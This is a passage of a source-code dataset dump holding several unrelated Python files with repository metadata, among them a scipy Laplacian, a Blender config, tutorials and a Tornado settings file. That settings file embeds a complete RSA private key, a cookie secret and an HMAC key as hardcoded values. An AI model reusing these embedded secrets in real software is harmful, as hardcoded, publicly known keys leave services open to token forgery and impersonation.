| 25.8 | 60 | 0.813953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.503876 |
d5fcff660972d9337742f70ae81e7f0f26eaadac | 310 | py | Python | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | setup.py | martinfarrow/awspk | c3b5f8ede44ca96473b95f52ddb2291a45828565 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from setuptools import setup, find_packages
setup(name='awspk',
version='0.1',
description='A aws cli pen knife with loads of interested stuff',
author='Martin Farrow',
author_email='awspk@dibley.net',
py_modules=['awspk'],
license='LICENSE',
)
| 23.846154 | 71 | 0.651613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.435484 |
9119b7e105152a68ddb6c7704cd3d58179e633e6 | 4,687 | py | Python | gavPrj/dataset_core.py | GavinK-ai/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | 1 | 2021-11-15T06:16:44.000Z | 2021-11-15T06:16:44.000Z | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | gavPrj/dataset_core.py | JKai96/cv | 6dd11b2100c40aca281508c3821c807ef0ee227d | [
"MIT"
] | null | null | null | import os
import cv2 as cv
import matplotlib.pyplot as plt
import numpy as np
#srcPaths = ('dataset/Screenshot1','dataset/Screenshot2','dataset/Screenshot3', 'dataset/Screenshot4')
#srcPaths = ('all_dataset/s1',
# 'all_dataset/s10',
# 'all_dataset/s11',
# 'all_dataset/s12',
# 'all_dataset/s13',
# 'all_dataset/s14',
# 'all_dataset/s15',
# 'all_dataset/s16',
# 'all_dataset/s17',
# 'all_dataset/s18',
# 'all_dataset/s19',
# 'all_dataset/s2',
# 'all_dataset/s20',
# 'all_dataset/s21',
# 'all_dataset/s22',
# 'all_dataset/s23',
# 'all_dataset/s24',
# 'all_dataset/s25',
# 'all_dataset/s26',
# 'all_dataset/s27',
# 'all_dataset/s28',
# 'all_dataset/s29',
# 'all_dataset/s3',
# 'all_dataset/s30',
# 'all_dataset/s31',
# 'all_dataset/s32',
# 'all_dataset/s33',
# 'all_dataset/s34',
# 'all_dataset/s35',
# 'all_dataset/s36',
# 'all_dataset/s37',
# 'all_dataset/s38',
# 'all_dataset/s39',
# 'all_dataset/s4',
# 'all_dataset/s40',
# 'all_dataset/s41',
# 'all_dataset/s42',
# 'all_dataset/s43',
# 'all_dataset/s44',
# 'all_dataset/s45',
# 'all_dataset/s46',
# 'all_dataset/s47',
# 'all_dataset/s48',
# 'all_dataset/s49',
# 'all_dataset/s5',
# 'all_dataset/s50',
# 'all_dataset/s51',
# 'all_dataset/s52',
# 'all_dataset/s53',
# 'all_dataset/s54',
# 'all_dataset/s55',
# 'all_dataset/s56',
# 'all_dataset/s57',
# 'all_dataset/s58',
# 'all_dataset/s59',
# 'all_dataset/s6',
# 'all_dataset/s60',
# 'all_dataset/s61',
# 'all_dataset/s62',
# 'all_dataset/s63',
# 'all_dataset/s7',
# 'all_dataset/s8',
# 'all_dataset/s9')
srcPaths = ('testdataset/t1','testdataset/t2')
datasetfilename = 'testdataset1.npz'
def create_dataset(datasetfilename, srcPaths, classNames):
imgList = []
labelList = []
labelNameList = []
for srcPath in srcPaths:
# append all files in srcPath dir into imgList and labelList
for fname in os.listdir(srcPath):
filePath = os.path.join(srcPath, fname)
img = cv.imread(filePath)
# spilt the last text in file name to save as label
fname_no_ext = os.path.splitext(fname)[0]
# label = fname_no_ext[-1]
label = fname_no_ext
imgList.append(img)
labelList.append(classNames[label])
labelNameList.append(label)
# convert to imgList to numpy
images = np.array(imgList, dtype='object')
labels = np.array(labelList, dtype='object')
labelnames = np.array(labelNameList)
# save converted images and labels into compressed numpy zip file
np.savez_compressed(datasetfilename, images=images, labels=labels, labelnames=labelnames)
return True
def displayImg():
# for fname in os.listdir(srcPath):
pass
if __name__ == '__main__':
# save a dataset in numpy compressed format
# datasetfilename = 'tiredataset.npz'
classNames = {'afiq':0, 'azureen':1, 'gavin':2, 'goke':3, 'inamul':4, 'jincheng':5, 'mahmuda':6, 'numan':7, 'saseendran':8}
if create_dataset(datasetfilename, srcPaths, classNames):
data = np.load(datasetfilename, allow_pickle=True)
imgList = data['images']
labelList = data['labels']
labelNameList = data['labelnames']
img = imgList[0]
label = labelList[0]
labelNameList = data['labelnames']
imgRGB = img[:, :, ::-1]
plt.imshow(imgRGB)
plt.title(label)
plt.show()
print(imgList.shape)
print(labelList.shape)
# imgList, labelList = create_dataset()
# img = imgList[0]
# label = labelList[0]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[1]
# label = labelList[1]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
# img = imgList[3]
# label = labelList[3]
# imgRGB = img[:, :, ::-1]
# plt.imshow(imgRGB)
# plt.title(label)
# plt.show()
| 26.331461 | 128 | 0.528056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,287 | 0.487945 |
9120d4c7c58950a1c79165874f5716c1d3e76e4c | 4,421 | py | Python | scipy/sparse/csgraph/_laplacian.py | seberg/scipy | d8081cdd40ed8cbebd5905c0ad6c323c57d5da6e | [
"BSD-3-Clause"
] | 1 | 2018-10-04T15:34:14.000Z | 2018-10-04T15:34:14.000Z | scipy/sparse/csgraph/_laplacian.py | seberg/scipy | d8081cdd40ed8cbebd5905c0ad6c323c57d5da6e | [
"BSD-3-Clause"
] | null | null | null | scipy/sparse/csgraph/_laplacian.py | seberg/scipy | d8081cdd40ed8cbebd5905c0ad6c323c57d5da6e | [
"BSD-3-Clause"
] | null | null | null | """
Laplacian of a compressed-sparse graph
"""
# Authors: Aric Hagberg <hagberg@lanl.gov>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Jake Vanderplas <vanderplas@astro.washington.edu>
# License: BSD
import numpy as np
from scipy.sparse import isspmatrix, coo_matrix
###############################################################################
# Graph laplacian
def laplacian(csgraph, normed=False, return_diag=False):
""" Return the Laplacian matrix of a directed graph.
For non-symmetric graphs the out-degree is used in the computation.
Parameters
----------
csgraph : array_like or sparse matrix, 2 dimensions
compressed-sparse graph, with shape (N, N).
normed : bool, optional
If True, then compute normalized Laplacian.
return_diag : bool, optional
If True, then return diagonal as well as laplacian.
Returns
-------
lap : ndarray
The N x N laplacian matrix of graph.
diag : ndarray
The length-N diagonal of the laplacian matrix.
diag is returned only if return_diag is True.
Notes
-----
The Laplacian matrix of a graph is sometimes referred to as the
"Kirchoff matrix" or the "admittance matrix", and is useful in many
parts of spectral graph theory. In particular, the eigen-decomposition
of the laplacian matrix can give insight into many properties of the graph.
For non-symmetric directed graphs, the laplacian is computed using the
out-degree of each node.
Examples
--------
>>> from scipy.sparse import csgraph
>>> G = np.arange(5) * np.arange(5)[:, np.newaxis]
>>> G
array([[ 0, 0, 0, 0, 0],
[ 0, 1, 2, 3, 4],
[ 0, 2, 4, 6, 8],
[ 0, 3, 6, 9, 12],
[ 0, 4, 8, 12, 16]])
>>> csgraph.laplacian(G, normed=False)
array([[ 0, 0, 0, 0, 0],
[ 0, 9, -2, -3, -4],
[ 0, -2, 16, -6, -8],
[ 0, -3, -6, 21, -12],
[ 0, -4, -8, -12, 24]])
"""
if csgraph.ndim != 2 or csgraph.shape[0] != csgraph.shape[1]:
raise ValueError('csgraph must be a square matrix or array')
if normed and (np.issubdtype(csgraph.dtype, np.int)
or np.issubdtype(csgraph.dtype, np.uint)):
csgraph = csgraph.astype(np.float)
if isspmatrix(csgraph):
return _laplacian_sparse(csgraph, normed=normed,
return_diag=return_diag)
else:
return _laplacian_dense(csgraph, normed=normed,
return_diag=return_diag)
def _laplacian_sparse(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
if not graph.format == 'coo':
lap = (-graph).tocoo()
else:
lap = -graph.copy()
diag_mask = (lap.row == lap.col)
if not diag_mask.sum() == n_nodes:
# The sparsity pattern of the matrix has holes on the diagonal,
# we need to fix that
diag_idx = lap.row[diag_mask]
diagonal_holes = list(set(range(n_nodes)).difference(
diag_idx))
new_data = np.concatenate([lap.data, np.ones(len(diagonal_holes))])
new_row = np.concatenate([lap.row, diagonal_holes])
new_col = np.concatenate([lap.col, diagonal_holes])
lap = coo_matrix((new_data, (new_row, new_col)), shape=lap.shape)
diag_mask = (lap.row == lap.col)
lap.data[diag_mask] = 0
w = -np.asarray(lap.sum(axis=1)).squeeze()
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap.data /= w[lap.row]
lap.data /= w[lap.col]
lap.data[diag_mask] = (1 - w_zeros[lap.row[diag_mask]]).astype(lap.data.dtype)
else:
lap.data[diag_mask] = w[lap.row[diag_mask]]
if return_diag:
return lap, w
return lap
def _laplacian_dense(graph, normed=False, return_diag=False):
n_nodes = graph.shape[0]
lap = -np.asarray(graph) # minus sign leads to a copy
# set diagonal to zero
lap.flat[::n_nodes + 1] = 0
w = -lap.sum(axis=0)
if normed:
w = np.sqrt(w)
w_zeros = (w == 0)
w[w_zeros] = 1
lap /= w
lap /= w[:, np.newaxis]
lap.flat[::n_nodes + 1] = 1 - w_zeros
else:
lap.flat[::n_nodes + 1] = w
if return_diag:
return lap, w
return lap
| 32.507353 | 86 | 0.570007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,112 | 0.47772 |
9120f5bc8f814b4692efc7406b81c0fe8103d83e | 7,225 | py | Python | samples/barebone/settings.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | 1 | 2018-10-12T15:12:15.000Z | 2018-10-12T15:12:15.000Z | samples/barebone/settings.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | null | null | null | samples/barebone/settings.py | kuasha/peregrine | b3dd92146d26fe9e4ea589868431b590324b47d1 | [
"MIT"
] | null | null | null | import os
import logging
from collections import namedtuple
from Crypto.PublicKey import RSA
from tornado import gen
from tornado import concurrent
from cosmos.rbac.object import *
from cosmos.service import OBSERVER_PROCESSOR
DEBUG = True
DB_HOST = "127.0.0.1"
DB_NAME = "cosmos"
DB_PORT = 27017
DB_USER_NAME = None
DB_USER_PASSWORD = None
LOG_DB_HOST = "127.0.0.1"
LOG_DB_NAME = "cosmos"
LOG_COL_NAME = "log"
LOG_DB_PORT = 27017
LOG_LEVEL = logging.DEBUG
LOG_DB_USER_NAME = None
LOG_DB_USER_PASSWORD = None
STATIC_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "app")
TEMPLATE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "templates")
INDEX_HTML_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "app/index.html")
LOGIN_HTML_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "templates/login.html")
WEB_SERVER_LISTEN_PORT = 8080
DB_CHANGE_PROCESSOR_ENDPOINT_FORMAT = "http://localhost:{0}/handlechange"
#TODO: You MUST change the following values
COOKIE_SECRET = "+8/YqtEUQfiYLUdO2iJ2OyzHHFSADEuKvKYwFqemFas="
HMAC_KEY = "+8/YqtEUQfiYLUdO2iJ2OyzHIFSAKEuKvKYwFqemFas="
facebook_client_id='000000000000000'
facebook_client_secret='00000000000000000000000000000000'
facebook_scope = "email,public_profile,user_friends"
facebook_redirect_uri = None
DEFAULT_LOGIN_NEXT_URI = "/"
"""
# pip install pycrypto for Crypto
# then from python console generate private_pem and public_pen and assign to SERVICE_PRIVATE_KEY and SERVICE_PUBLIC_KEY
import Crypto.PublicKey.RSA as RSA
key = RSA.generate(2048)
private_pem = key.exportKey()
public_pem = key.publickey().exportKey()
"""
# TODO: set both keys below. Private key backup must be kept in a secure place and should never be shared
# If private key is compromised, this service and all other services that trust this will be compromised
# Public key is to share publicly for verification
SERVICE_PRIVATE_KEY = None
SERVICE_PUBLIC_KEY = None
directory_listing_allowed = True
CONFIGURE_LOG = False
START_WEB_SERVER = True
START_OBJECT_CHANGE_MONITOR = False
GOOGLE_OAUTH2_CLIENT_ID = None
GOOGLE_OAUTH2_CLIENT_SECRET = None
GOOGLE_OAUTH2_REDIRECT_URI = None
GITHUB_CLIENT_ID = None
GITHUB_CLIENT_SECRET = None
GITHUB_OAUTH2_CALLBACK_URI = None
USERS_IDENTITY_COL_NAME = "cosmos.users.identity"
USERS_PROFILE_FB_COL_NAME = "cosmos.users.profile.facebook"
USERS_FB_FRIENDS_COL_NAME = "cosmos.users.facebook.friends"
login_url = "/login/"
OAUTH2_SERVICE_URL = r"/(?P<tenant_id>[^\/]+)/oauth2/(?P<function>[^\/]+)/"
OAUTH2_PRIVATE_KEY_PEM = b'-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAl0RIYISOe+9F8dRkm+XQrdaVsn/d3GjufnBnFARRgceu+E6q\nWLlptI5arhckFyXjDOAUEuMnOwmISfeXHrIIp4BU6RMjqRw6ciaIhI7e3LSn5fQ7\nOwCywUaHlUkyq+zQynfH77lUC95YumyUQzGVfdiwQw8XZZYDo2wAFMKJa8heo38Z\nQ0HT788VrcuSa1f4PY9i/wRHXF+xp/9NWUE7wER8eNJjqKxkm0EUKYuB23vUFLHh\n8PG7DiATUlCCpV5txhHcNXa2iEoOGecdWg8Yk5Qs2Gq9aqacJGcgfFK9DN+2/yLn\nFEj+xMVPhB2ynILoJ9N+lfA3TE6nWVKiuriXBQIDAQABAoIBAQCAX2CVGKnbH+ra\nGofvjg+VGCEexUlBvoN4Jmg0Ip4RZ6dj70690UyWAKGQUO89/dc8nAYtKT2n6qUR\nMN+9GxYhINXun2GKKPyo127QIHeeEmrSynxhzGvnfrWdyesI4QcobJLvLPbYw6/F\nNlR02eWmUXj00B/pBHC+Be/jrlz1bF5Gwbw/RINzEJPOxVfaN2D31lotetx5WnV7\nXrTxR5ONpCnwbK8phH4/vQL3rv+ZJgKVhRM8uqd+auW5Lp57y36JFXb+g5SmkFo3\nq+mB2CfMkyip8zpJGDyyVo8XiI1jKieqaiimZ4zpJZwkClBzYsFmio60f9smMGYB\n+nQCX5iZAoGBAL6WtY9BSL0hIxMIwDh4C87rORMmy8ZW5sl91wdFHmjnqlc2Q2yS\n3uVwK32BvxQCTq6FXNRoqYO0xHSrrupSRTJD5KT9EoxpaGlqi1MSB6U6o7r41bSb\nhNwcjKJ40OSABZ/YzATOwq9+AfgU+pMZD+WNlzesYL+7QIPHyKXdwrPLAoGBAMsu\ntcUadzsZEmaaSW5xtouyZF5tWPadB6VZ0Gney8x6uWQ2+ZGLv0QRIxJP0f4cBTkY\nsPx5pUZuo7oaDzCaRH9cV2VJFBahsGrFqcsexVsKh8CfZEMD1PBptodD1Cialr9M\nL0RdSu+1lmcfRqxOXSlaMSHml/cqfOjfHOj3RaZvAoGAEG2LLtLwwySlElHxx6xJ\nUEekPstcSzdYY0vOihjiGybE3wmVXDl4rwwxI3tYjg/42kAylTiETA771BasWBRJ\nVKDXh4Us4R+A2X1OjxWBxTM9w7MJMK0rEZIAaUzCrL+APJwCUfPEgj35S3n7c0x4\nu0+uFiVsnXo1gGZrHCj2TGsCgYEApm3Ccos1MvFcgzLKB2+ZqWAcmsRS5N7Hjoe9\nEZtvsDSuewoU70VbDDRFWBCN3+mv1Y8GGijCWqjx79S8sIEMro5DADIWBFu5GByE\n8l5oJiTAAeYNyF7xI2RUIQRMWl4WMOgEp6kLYsKJSjryNt2Rrfe02yH5RHpHCrEH\nC0TQhn0CgYB0iyjs20bdGYYWNTMlSYPtf8LVhUktvGYyytA/sepRXUe13T87vjCc\nvD3utXPsuaBVGhloE7Dk5YHJdar4n5UcLITNJnu1TyRM4binlzbU4rByxVjclaSX\nGB0O/DCgCsgNFK+LFKf/N1EhRxwJKy+BLVWCIshsAxNv26u296I9jA==\n-----END RSA PRIVATE KEY-----'
OAUTH2_PUBLIC_KEY_PEM = b'-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAl0RIYISOe+9F8dRkm+XQ\nrdaVsn/d3GjufnBnFARRgceu+E6qWLlptI5arhckFyXjDOAUEuMnOwmISfeXHrII\np4BU6RMjqRw6ciaIhI7e3LSn5fQ7OwCywUaHlUkyq+zQynfH77lUC95YumyUQzGV\nfdiwQw8XZZYDo2wAFMKJa8heo38ZQ0HT788VrcuSa1f4PY9i/wRHXF+xp/9NWUE7\nwER8eNJjqKxkm0EUKYuB23vUFLHh8PG7DiATUlCCpV5txhHcNXa2iEoOGecdWg8Y\nk5Qs2Gq9aqacJGcgfFK9DN+2/yLnFEj+xMVPhB2ynILoJ9N+lfA3TE6nWVKiuriX\nBQIDAQAB\n-----END PUBLIC KEY-----'
OAUTH2_TOKEN_EXPIRY_SECONDS = 600
TENANT_ID = 'cosmosframework.com'
OAUTH2_TRUSTED_REDIRECT_URLS = ['http://localhost:8080/oauth2client/authorize/']
AUTH_PUBLIC_KEY_PEM_URL = r"/(?P<tenant_id>[^\/]+)/auth/key/"
#TODO: You should remove this processon in production environment
def test_observer(user, object_service, object_name, data, access_type, columns = None, *args, **kwargs):
assert object_name == "test"
assert access_type == AccessType.READ or access_type == AccessType.INSERT or access_type == AccessType.UPDATE or access_type == AccessType.DELETE
logging.info("Test object observer is called with [{}, {}, {}, {}, {}, {}].".format(user, object_service, object_name, data, access_type, columns))
if AccessType.INSERT == access_type:
val = concurrent.Future()
val.set_result(data)
return (val)
if AccessType.UPDATE == access_type or AccessType.DELETE == access_type:
r = ({"error": None, "n": 1, "ok": 1, "updatedExisting": 1})
val = concurrent.Future()
val.set_result({"_id":r})
return (val)
find_one = kwargs.get("find_one", False)
if find_one:
val = concurrent.Future()
val.set_result({"_id":data})
return (val)
else:
Result = namedtuple("CosmosEmptyResultSet", "fetch_next")
val = concurrent.Future()
val.set_result(False)
return (Result(fetch_next=val))
observers = [
{
"object_name": "test",
"function": test_observer,
"access": [AccessType.READ, AccessType.INSERT, AccessType.UPDATE, AccessType.DELETE],
"type": OBSERVER_PROCESSOR
}
]
try:
from local_settings import *
except ImportError:
pass
if DB_USER_NAME and DB_USER_PASSWORD:
DATABASE_URI = "mongodb://"+ DB_USER_NAME + ":"+ DB_USER_PASSWORD +"@"+ DB_HOST+":"+str(DB_PORT)+"/"+DB_NAME
else:
DATABASE_URI = "mongodb://"+DB_HOST+":"+str(DB_PORT)
if LOG_DB_USER_NAME and LOG_DB_USER_PASSWORD:
LOG_DATABASE_URI = "mongodb://"+ LOG_DB_USER_NAME + ":"+ LOG_DB_USER_PASSWORD +"@"+ LOG_DB_HOST+":"+str(LOG_DB_PORT)+"/"+LOG_DB_NAME
else:
LOG_DATABASE_URI = "mongodb://"+ LOG_DB_HOST+":"+str(LOG_DB_PORT)
GOOGLE_OAUTH2_SETTINGS = {"key": GOOGLE_OAUTH2_CLIENT_ID, "secret": GOOGLE_OAUTH2_CLIENT_SECRET, "redirect_uri": GOOGLE_OAUTH2_REDIRECT_URI}
GITHUB_OAUTH_SETTINGS = {"client_id": GITHUB_CLIENT_ID, "secret": GITHUB_CLIENT_SECRET, "redirect_uri": GITHUB_OAUTH2_CALLBACK_URI}
| 47.847682 | 1,732 | 0.800969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,728 | 0.515986 |
9125a2258a5cbeeafce52644773c51a924d107ac | 392 | py | Python | exemplos/exemplo-aula-14-01.py | quitaiskiluisf/TI4F-2021-LogicaProgramacao | d12e5c389a43c98f27726df5618fe529183329a8 | [
"Unlicense"
] | null | null | null | exemplos/exemplo-aula-14-01.py | quitaiskiluisf/TI4F-2021-LogicaProgramacao | d12e5c389a43c98f27726df5618fe529183329a8 | [
"Unlicense"
] | null | null | null | exemplos/exemplo-aula-14-01.py | quitaiskiluisf/TI4F-2021-LogicaProgramacao | d12e5c389a43c98f27726df5618fe529183329a8 | [
"Unlicense"
] | null | null | null | # Apresentação
print('Programa para somar 8 valores utilizando vetores/listas')
print()
# Declaração do vetor
valores = [0, 0, 0, 0, 0, 0, 0, 0]
# Solicita os valores
for i in range(len(valores)):
valores[i] = int(input('Informe o valor: '))
# Cálculo da soma
soma = 0
for i in range(len(valores)):
soma += valores[i]
# Apresenta o resultado
print(f'A soma dos valores é {soma}')
| 20.631579 | 64 | 0.67602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.522613 |
91266dc2fa03da47339e3882e71342b1ee45462b | 2,326 | py | Python | pbr/config/blend_config.py | NUbots/NUpbr | 49b0d2abd15512a93bfe21157269288c9ec4c54d | [
"MIT"
] | 1 | 2019-03-25T04:37:06.000Z | 2019-03-25T04:37:06.000Z | pbr/config/blend_config.py | NUbots/NUpbr | 49b0d2abd15512a93bfe21157269288c9ec4c54d | [
"MIT"
] | 3 | 2020-07-24T11:55:48.000Z | 2022-02-20T20:49:17.000Z | pbr/config/blend_config.py | NUbots/NUpbr | 49b0d2abd15512a93bfe21157269288c9ec4c54d | [
"MIT"
] | null | null | null | # Blender-specific Configuration Settings
from math import pi
render = {
"render_engine": "CYCLES",
"render": {"cycles_device": "GPU"},
"dimensions": {"resolution": [1280, 1024], "percentage": 100.0},
"sampling": {"cycles_samples": 256, "cycles_preview_samples": 16},
"light_paths": {
"transparency": {"max_bounces": 1, "min_bounces": 1},
"bounces": {"max_bounces": 1, "min_bounces": 1},
"diffuse": 1,
"glossy": 1,
"transmission": 1,
"volume": 0,
"reflective_caustics": False,
"refractive_caustics": False,
},
"performance": {
"render_tile": [512, 512],
"threads": {"mode": "FIXED", "num_threads": 8},
},
"layers": {"use_hair": False},
}
scene = {"units": {"length_units": "METRIC", "rotation_units": "DEGREES"}}
layers = {"denoising": {"use_denoising": False}}
field = {
"material": {
"mapping": {
"translation": (0.0, 0.05, 0.0),
"rotation": (0.0, -pi / 2.0, 0.0),
"scale": (1.0, 0.6, 1.0),
},
"mix_lower_grass": {
"inp1": (0.000, 0.012, 0.00076, 1.0),
"inp2": (0.020, 0.011, 0.0, 1.0),
},
"mix_upper_grass": {
"inp1": (0.247, 0.549, 0.0, 1),
"inp2": (0.257, 0.272, 0.0, 1),
},
"noise": {"inp": [5.0, 2.0, 0.0]},
"hsv": {"inp": [0.0, 0.0, 1.9, 1.0]},
"mix_up_grass_hsv": {"inp0": 0.455},
"mix_low_grass_field_lines": {"inp0": 0.4},
"mix_grass": {"inp0": 0.391},
"principled": {"specular": 0.225, "roughness": 0.625},
},
"lower_plane": {
"colour": (0.003, 0.04, 0.0, 1.0),
"principled": {"specular": 0.225, "roughness": 1.0},
"mapping": {"scale": (0.1, 0.1, 1.0)},
},
}
ball = {
"initial_cond": {"segments": 16, "ring_count": 10, "calc_uvs": True},
"material": {"metallic": 0.0, "roughness": 0.35},
"subsurf_mod": {"levels": 1, "rend_levels": 4},
}
goal = {
"initial_cond": {"vertices": 32, "calc_uvs": True},
"corner_curve": {"fill": "FULL"},
"material": {"metallic": 0.0, "roughness": 0.35, "colour": (0.8, 0.8, 0.8, 1.0)},
"subsurf_mod": {"levels": 1, "rend_levels": 4},
}
robot = {"material": {"specular": 0.742, "metallic": 0.0, "roughness": 0.9}}
| 31.432432 | 85 | 0.503439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,097 | 0.471625 |
913206ffbcd62d973e6003afaac405c6a7ea1d3b | 524 | py | Python | portfolio_optimization/constants.py | AI-Traiding-Team/paired_trading | 72d4dd0071314e2f0efaa26931ca7339199fc998 | [
"MIT"
] | 1 | 2022-03-26T23:21:51.000Z | 2022-03-26T23:21:51.000Z | portfolio_optimization/constants.py | AI-Traiding-Team/paired_trading | 72d4dd0071314e2f0efaa26931ca7339199fc998 | [
"MIT"
] | null | null | null | portfolio_optimization/constants.py | AI-Traiding-Team/paired_trading | 72d4dd0071314e2f0efaa26931ca7339199fc998 | [
"MIT"
] | 3 | 2021-12-07T07:39:43.000Z | 2022-01-24T05:05:55.000Z | import os
path1 = "outputs"
path2 = "outputs/_imgs"
path3 = "outputs/max_sharpe_weights"
path4 = "outputs/opt_portfolio_trades"
try:
os.mkdir(path1)
except OSError:
print ("Директория %s уже создана" % path1)
else:
print ("Успешно создана директория %s " % path1)
try:
os.makedirs(path2)
os.makedirs(path3)
os.makedirs(path4)
except OSError:
print ("Директории уже созданы")
else:
print ("Успешно созданы нужные директории")
source_path = '../source_root/1m'
destination_path = 'outputs' | 20.153846 | 52 | 0.704198 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 322 | 0.521036 |
913439b2a09a820bfc3faefc3e105469f128a1a8 | 1,352 | py | Python | examples/qmmm/02-mcscf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 501 | 2018-12-06T23:48:17.000Z | 2022-03-31T11:53:18.000Z | examples/qmmm/02-mcscf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 710 | 2018-11-26T22:04:52.000Z | 2022-03-30T03:53:12.000Z | examples/qmmm/02-mcscf.py | QuESt-Calculator/pyscf | 0ed03633b699505c7278f1eb501342667d0aa910 | [
"Apache-2.0"
] | 273 | 2018-11-26T10:10:24.000Z | 2022-03-30T12:25:28.000Z | #!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
A simple example to run MCSCF with background charges.
'''
import numpy
from pyscf import gto, scf, mcscf, qmmm
mol = gto.M(atom='''
C 1.1879 -0.3829 0.0000
C 0.0000 0.5526 0.0000
O -1.1867 -0.2472 0.0000
H -1.9237 0.3850 0.0000
H 2.0985 0.2306 0.0000
H 1.1184 -1.0093 0.8869
H 1.1184 -1.0093 -0.8869
H -0.0227 1.1812 0.8852
H -0.0227 1.1812 -0.8852
''',
basis='3-21g',
verbose=4)
numpy.random.seed(1)
coords = numpy.random.random((5,3)) * 10
charges = (numpy.arange(5) + 1.) * -.1
#
# There are two ways to add background charges to MCSCF method.
# The recommended one is to initialize it in SCF calculation. The MCSCF
# calculation takes the information from SCF objects.
#
mf = qmmm.mm_charge(scf.RHF(mol), coords, charges).run()
mc = mcscf.CASSCF(mf, 6, 6)
mc.run()
mc = mcscf.CASCI(mf, 6, 6)
mc.run()
#
# The other method is to patch the MCSCF object with the background charges.
# Note: it updates the underlying SCF object inplace.
#
mo_init = mf.mo_coeff
mf = scf.RHF(mol)
mc = mcscf.CASSCF(mf, 6, 6)
mc = qmmm.mm_charge(mc, coords, charges)
mc.run(mo_init)
mf = scf.RHF(mol)
mc = mcscf.CASCI(mf, 6, 6)
mc = qmmm.mm_charge(mc, coords, charges)
mc.run(mo_init)
| 22.915254 | 76 | 0.637574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 755 | 0.558432 |
9136160d5624a0c97151f5a92ef4449fe0be2b28 | 1,951 | py | Python | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | ArraysP2.py | EdgarVallejo96/pyEdureka | f103f67ed4f9eee6ab924237e9d94a489e602c7c | [
"MIT"
] | null | null | null | import array as arr
a = arr.array('i', [ 1,2,3,4,5,6])
print(a)
# Accessing elements
print(a[2])
print(a[-2])
# BASIC ARRAY OPERATIONS
# Find length of array
print()
print('Length of array')
print(len(a))
# Adding elments to an array
# append() to add a single element at the end of an array
# extend() to add more than one element at the end of an array
# insert() to add an element at a specific position in an array
print()
# append
print('Append')
a.append(8)
print(a)
# extend
print()
print('Extend')
a.extend([9,8,6,5,4])
print(a)
# insert
print()
print('Insert')
a.insert(2,6) # first param is the index, second param is the value
print(a)
# Removing elements from an array
# pop() Remove an element and return it
# remove() Remove element with a specific value without returning it
print()
print(a)
# pop
print('pop')
print(a.pop()) # removes last element
print(a)
print(a.pop(2))
print(a)
print(a.pop(-1))
print(a)
# remove
print()
print('remove')
print(a.remove(8)) # doesn't return what it removes, it removed the first occurrence of '8'
print(a)
# Array Concatenation
print()
print('Array Concatenation')
b = arr.array('i', [1,2,3,4,5,6,7])
c = arr.array('i', [3,4,2,1,3,5,6,7,8])
d = arr.array('i')
d = b + c
print(d)
# Slicing an Array
print()
print('Slicing an Array') # This means fetching some particular values from an array
print(d)
print(d[0:5]) # Doesn't include the value on the right index
print(d[0:-2])
print(d[::-1]) # Reverse the array, this method is not preferred because it exauhsts the memory
# Looping through an Array
print()
print('Looping through an Array')
print('Using for')
for x in d:
print(x, end=' ')
print()
for x in d[0:-3]:
print(x, end=' ')
print()
print('Using while')
temp = 0
while temp < d[2]:
print(d[temp], end = ' ')
temp = temp + 1 # Can use temp+=1, it's the same thing
print()
print(a)
tem = 0
while tem < len(a):
print(a[tem], end=' ')
tem += 1
print()
| 18.759615 | 95 | 0.664787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,054 | 0.540236 |
91374929866f2c29362313f46503faaf0a90ed51 | 1,506 | py | Python | setup.py | yitzikc/athena2pd | d2d6b886a70e958f51d90103600572152eaa7bb9 | [
"MIT"
] | 1 | 2020-04-05T18:41:17.000Z | 2020-04-05T18:41:17.000Z | setup.py | yitzikc/athena2pd | d2d6b886a70e958f51d90103600572152eaa7bb9 | [
"MIT"
] | null | null | null | setup.py | yitzikc/athena2pd | d2d6b886a70e958f51d90103600572152eaa7bb9 | [
"MIT"
